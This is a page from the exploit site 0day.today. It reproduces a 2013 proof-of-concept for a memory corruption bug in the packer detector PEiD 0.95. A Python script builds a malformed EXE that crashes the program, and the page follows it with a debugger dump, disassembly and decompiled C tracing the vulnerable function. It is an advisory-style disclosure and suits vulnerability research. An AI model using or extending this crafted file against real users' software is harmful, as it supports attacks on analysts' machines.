0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PEiD 0.95 - Memory Corruption POC
# Title: PEiD v0.95 Memory Corruption # About PEiD : PEiD is an intuitive application that relies on its user-friendly interface to detect packers, cryptors and compilers found in PE executable files. Very popular among malware researchers for detection of packers / cryptors. # Date: 22nd June 2013 # Author: Debasish Mandal ( https://twitter.com/debasishm89 ) # Blog : http://www.debasish.in/ # Version: PEiD version 0.95 # Download Link : http://www.softpedia.com/progChangelog/PEiD-updated-Changelog-4102.html # Tested on: Windows XP SP2 / Windows 7 # Vendor Patch : Unpatched. This software is not under active development. Last stable version released on November 6th, 2008. # Threat mitigation : Exploitation of this issue requires the user to explicitly open a specially crafted EXE file. So the PEiD user should refrain from opening files from untrusted third parties or accessing untrusted remote sites. # POC # c:\python27 junk = "\x41" header = "MZ" header += junk * 58 header += "\x80" header += "\x00" * 3 header += junk * 64 header += "PE" header += "\x00"*2 header += junk * 3 header += "\x00" header += junk * 12 header += "\xe0\x00" header += junk * 2 header += "\x0b\x01" header += junk * 16 header += "\x00" * 2 header += junk * 338 header += "\x00" * 2 header += junk * 5 header += "\x00" * 3 header += junk * 2427 header += "\xa9" header += junk * 7 header += "\x90" header += junk * 3 header += "\x90" header += junk * 40 f = open('peid_poc.exe','wb') f.write(header) f.close() ''' Above python code will generate a crafted EXE. This EXE can be used as POC to trigger the Crash of PEiD version 0.95. (9fc.c2c): Access violation - code c0000005 (!!! second chance !!!) eax=00000000 ebx=6fbeca5e ecx=00d4fae0 edx=00000019 esi=00000000 edi=91164141 eip=0043d4d1 esp=00d4faac ebp=00d4fee8 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000286 *** WARNING: Unable to verify checksum for C:\Documents and Settings\debasish mandal\Desktop\Tools\PEiD-0.95-20081103\PEiD.exe *** ERROR: Module load completed but symbols could not be loaded for C:\Documents and Settings\debasish mandal\Desktop\Tools\PEiD-0.95-20081103\PEiD.exe PEiD+0x3d4d1: 0043d4d1 8a0c07 mov cl,byte ptr [edi+eax] ds:0023:91164141=?? PEiD Crashes at With Read AV @ 0043d4d1. EDI Register is pointing to ring0 : edi=91164141. Stack Trace: 0:001> kb ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00d4fee8 78b8c3c0 64123456 0000058f c4830000 PEiD+0x3d4d1 00d4ff04 0045d1e6 0040867c 00d4ff7c 00000000 0x78b8c3c0 00d4ff40 00455b97 0040867c 00d4ff7c 00000000 PEiD+0x5d1e6 00d4ffb4 7c80b50b 0048650c 001520a8 0012f4bc PEiD+0x55b97 00d4ffe0 7c80b517 00000000 00000000 00000000 kernel32!BaseThreadStart+0x37 00d4ffe4 00000000 00000000 00000000 00455a50 kernel32!BaseThreadStart+0x43 Stack Dump: 0:001> d esp 00d4faac 41 41 41 90 7c ff d4 00-40 ff d4 00 77 ca be 6f AAA.|...@...w..o 00d4fabc e0 fa d4 00 37 4c 44 00-41 41 16 91 77 ca be 6f ....7LD.AA..w..o 00d4facc dc fa d4 00 20 01 00 00-18 00 00 00 7c 86 40 00 .... .......|.@. 00d4fadc 90 41 91 7c e8 fe d4 00-19 00 00 00 08 00 00 00 .A.|............ 00d4faec 1a 00 00 00 1a 00 00 00-1a 00 00 00 05 00 00 00 ................ 00d4fafc 0c 00 00 00 1a 00 00 00-1a 00 00 00 1a 00 00 00 ................ 00d4fb0c 1a 00 00 00 1a 00 00 00-1a 00 00 00 1a 00 00 00 ................ 00d4fb1c 1a 00 00 00 1a 00 00 00-1a 00 00 00 1a 00 00 00 ................ 00DFFAAC 90414141 <- ESP 00DFFAB0 00DFFF7C 00DFFAB4 00DFFF40 00DFFAB8 6FBECA77 00DFFABC 00DFFAE0 00DFFAC0 00444C37 RETURN to PEiD.00444C37 from PEiD.0043D4A0 00DFFAC4 91084141 00DFFAC8 6FBECA77 00DFFACC 00DFFADC 00DFFAD0 00000120 00DFFAD4 00000018 00DFFAD8 0040867C PEiD.0040867C 00DFFADC 7C914190 RETURN to ntdll.7C914190 from ntdll.7C910387 Disassembly of the function where program crashed. Function : PEiD.0043D4A0 (I've named it as "crash_function") 0043D4A0 51 PUSH ECX 0043D4A1 8B51 04 MOV EDX,DWORD PTR DS:[ECX+4] 0043D4A4 8B4424 0C MOV EAX,DWORD PTR SS:[ESP+C] 0043D4A8 3BC2 CMP EAX,EDX 0043D4AA 890C24 MOV DWORD PTR SS:[ESP],ECX 0043D4AD 7D 06 JGE SHORT PEiD.0043D4B5 0043D4AF 32C0 XOR AL,AL 0043D4B1 59 POP ECX 0043D4B2 C2 0C00 RETN 0C 0043D4B5 53 PUSH EBX 0043D4B6 55 PUSH EBP 0043D4B7 8BD8 MOV EBX,EAX 0043D4B9 56 PUSH ESI 0043D4BA 2BDA SUB EBX,EDX 0043D4BC 33F6 XOR ESI,ESI 0043D4BE 57 PUSH EDI 0043D4BF 8B7C24 18 MOV EDI,DWORD PTR SS:[ESP+18] 0043D4C3 85DB TEST EBX,EBX 0043D4C5 7E 34 JLE SHORT PEiD.0043D4FB 0043D4C7 33C0 XOR EAX,EAX 0043D4C9 85D2 TEST EDX,EDX 0043D4CB 7E 42 JLE SHORT PEiD.0043D50F 0043D4CD 8B29 MOV EBP,DWORD PTR DS:[ECX] 0043D4CF 03FE ADD EDI,ESI 0043D4D1 8A0C07 MOV CL,BYTE PTR DS:[EDI+EAX] <- Code crashes here 0043D4D4 3A0C28 CMP CL,BYTE PTR DS:[EAX+EBP] 0043D4D7 75 07 JNZ SHORT PEiD.0043D4E0 0043D4D9 40 INC EAX 0043D4DA 3BC2 CMP EAX,EDX Setting a BP @ Entry 0x0043D4A0 of this function we can see the value of EDI register is already corrupted before entering into this function. To find out the cross reference which means other function calling above function we used IDA Pro. IDA Pro Shows us that this function is getting called multiple times: Direction Type Address Text --------- ---- ------- ---- Down p sub_43DF00+E1 call crash_function Down p sub_43F260+1E9 call crash_function Down p sub_43F260+230 call crash_function Down p sub_43F260+312 call crash_function Down p sub_43F260+346 call crash_function Down p sub_43F260+382 call crash_function Down p sub_43F260+3A9 call crash_function Down p vuln_func+162 call crash_function Down p sub_446020+1A5 call crash_function Down p sub_446020+1C7 call crash_function Down p sub_446020+20F call crash_function Down p sub_446020+22D call crash_function Down p sub_446020+271 call crash_function Down p sub_446020+28F call crash_function Down p sub_446020+2D6 call crash_function Down p sub_446020+2F8 call crash_function Down p sub_446020+339 call crash_function Down p sub_446020+357 call crash_function After Analyzing the code It was found found that below function is actually calling the PEiD.0043D4A0 function which triggers the crash: This is the actual vulnerable function which causes the corruption. 00444AD0 81EC 2C040000 SUB ESP,42C 00444AD6 A1 D4A54000 MOV EAX,DWORD PTR DS:[40A5D4] 00444ADB 33C4 XOR EAX,ESP 00444ADD 898424 28040000 MOV DWORD PTR SS:[ESP+428],EAX 00444AE4 33C9 XOR ECX,ECX 00444AE6 56 PUSH ESI 00444AE7 8BB424 38040000 MOV ESI,DWORD PTR SS:[ESP+438] 00444AEE 8B46 0C MOV EAX,DWORD PTR DS:[ESI+C] 00444AF1 C68424 10040000 >MOV BYTE PTR SS:[ESP+410],89 00444AF9 C68424 11040000 >MOV BYTE PTR SS:[ESP+411],4A 00444B01 C68424 12040000 >MOV BYTE PTR SS:[ESP+412],0FC 00444B09 C68424 13040000 >MOV BYTE PTR SS:[ESP+413],33 00444B11 C68424 14040000 >MOV BYTE PTR SS:[ESP+414],0C0 00444B19 C68424 15040000 >MOV BYTE PTR SS:[ESP+415],0C3 00444B21 C68424 16040000 >MOV BYTE PTR SS:[ESP+416],0B8 00444B29 C68424 17040000 >MOV BYTE PTR SS:[ESP+417],78 00444B31 C68424 18040000 >MOV BYTE PTR SS:[ESP+418],56 00444B39 C68424 19040000 >MOV BYTE PTR SS:[ESP+419],34 00444B41 C68424 1A040000 >MOV BYTE PTR SS:[ESP+41A],12 00444B49 C68424 1B040000 >MOV BYTE PTR SS:[ESP+41B],64 00444B51 C68424 1C040000 >MOV BYTE PTR SS:[ESP+41C],8F 00444B59 C68424 1D040000 >MOV BYTE PTR SS:[ESP+41D],5 00444B61 888C24 1E040000 MOV BYTE PTR SS:[ESP+41E],CL 00444B68 888C24 1F040000 MOV BYTE PTR SS:[ESP+41F],CL 00444B6F 888C24 20040000 MOV BYTE PTR SS:[ESP+420],CL 00444B76 888C24 21040000 MOV BYTE PTR SS:[ESP+421],CL 00444B7D C68424 22040000 >MOV BYTE PTR SS:[ESP+422],83 00444B85 C68424 23040000 >MOV BYTE PTR SS:[ESP+423],0C4 00444B8D C68424 24040000 >MOV BYTE PTR SS:[ESP+424],4 00444B95 C68424 25040000 >MOV BYTE PTR SS:[ESP+425],55 00444B9D C68424 26040000 >MOV BYTE PTR SS:[ESP+426],53 00444BA5 C68424 27040000 >MOV BYTE PTR SS:[ESP+427],51 00444BAD C68424 28040000 >MOV BYTE PTR SS:[ESP+428],57 00444BB5 0FB740 06 MOVZX EAX,WORD PTR DS:[EAX+6] 00444BB9 83F8 02 CMP EAX,2 00444BBC 73 18 JNB SHORT PEiD.00444BD6 00444BBE 32C0 XOR AL,AL 00444BC0 5E POP ESI 00444BC1 8B8C24 28040000 MOV ECX,DWORD PTR SS:[ESP+428] 00444BC8 33CC XOR ECX,ESP 00444BCA E8 A88F0200 CALL PEiD.0046DB77 00444BCF 81C4 2C040000 ADD ESP,42C 00444BD5 C3 RETN 00444BD6 53 PUSH EBX 00444BD7 57 PUSH EDI 00444BD8 8B7E 18 MOV EDI,DWORD PTR DS:[ESI+18] 00444BDB 8D1480 LEA EDX,DWORD PTR DS:[EAX+EAX*4] 00444BDE 8B7CD7 EC MOV EDI,DWORD PTR DS:[EDI+EDX*8-14] 00444BE2 51 PUSH ECX 00444BE3 48 DEC EAX 00444BE4 50 PUSH EAX 00444BE5 8BCE MOV ECX,ESI 00444BE7 E8 748A0100 CALL PEiD.0045D660 00444BEC 8BD8 MOV EBX,EAX 00444BEE 8D043B LEA EAX,DWORD PTR DS:[EBX+EDI] 00444BF1 3B46 04 CMP EAX,DWORD PTR DS:[ESI+4] 00444BF4 76 1A JBE SHORT PEiD.00444C10 00444BF6 5F POP EDI 00444BF7 5B POP EBX 00444BF8 32C0 XOR AL,AL 00444BFA 5E POP ESI 00444BFB 8B8C24 28040000 MOV ECX,DWORD PTR SS:[ESP+428] 00444C02 33CC XOR ECX,ESP 00444C04 E8 6E8F0200 CALL PEiD.0046DB77 00444C09 81C4 2C040000 ADD ESP,42C 00444C0F C3 RETN 00444C10 6A 19 PUSH 19 00444C12 8D8C24 1C040000 LEA ECX,DWORD PTR SS:[ESP+41C] 00444C19 51 PUSH ECX 00444C1A 8D4C24 18 LEA ECX,DWORD PTR SS:[ESP+18] 00444C1E E8 1D87FFFF CALL PEiD.0043D340 00444C23 8B06 MOV EAX,DWORD PTR DS:[ESI] 00444C25 8D5424 0C LEA EDX,DWORD PTR SS:[ESP+C] 00444C29 52 PUSH EDX 00444C2A 53 PUSH EBX 00444C2B 03C7 ADD EAX,EDI 00444C2D 50 PUSH EAX 00444C2E 8D4C24 1C LEA ECX,DWORD PTR SS:[ESP+1C] 00444C32 E8 6988FFFF CALL PEiD.0043D4A0 <- CAll to the crash function Equivalent C Code: char vuln_func(int a1, int a2) { int v6; v3 = (a2 + 12); v9 = -119; v10 = 74; v11 = -4; // Declaration of few more local variables. Ommited v2 = (v3 + 6); if ( v2 >= 2 ) { v6 = ((a2 + 24) + 40 * v2 - 20); // <<--- v5 = before_crash1(a2, v2 - 1, 0); if ((v5 + v6) <= (a2 + 4) ) { before_crash2(&v9, 25); result = crash_function((int)&v8, v6 + a2, v5, (int)&v7); //Vulnerable function calling the crash_function. Inside this peid prog. will crash } else { result = 0; } } else { result = 0; } return result; } ''' # 0day.today [2024-12-25] #